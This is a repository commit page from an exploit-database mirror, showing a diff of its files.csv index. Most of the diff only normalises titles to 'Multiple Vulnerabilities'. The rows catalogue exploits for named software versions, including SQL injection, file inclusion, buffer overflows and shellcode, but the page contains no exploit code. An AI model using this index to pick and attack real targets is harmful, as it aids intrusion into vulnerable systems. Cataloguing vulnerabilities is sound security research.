bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-03-17

Browse source 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
This commit is contained in:
Offensive Security 2016-03-17 07:07:56 +00:00
parent 48534c54b0
commit 477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

39
files.csv
View file

@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0 12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
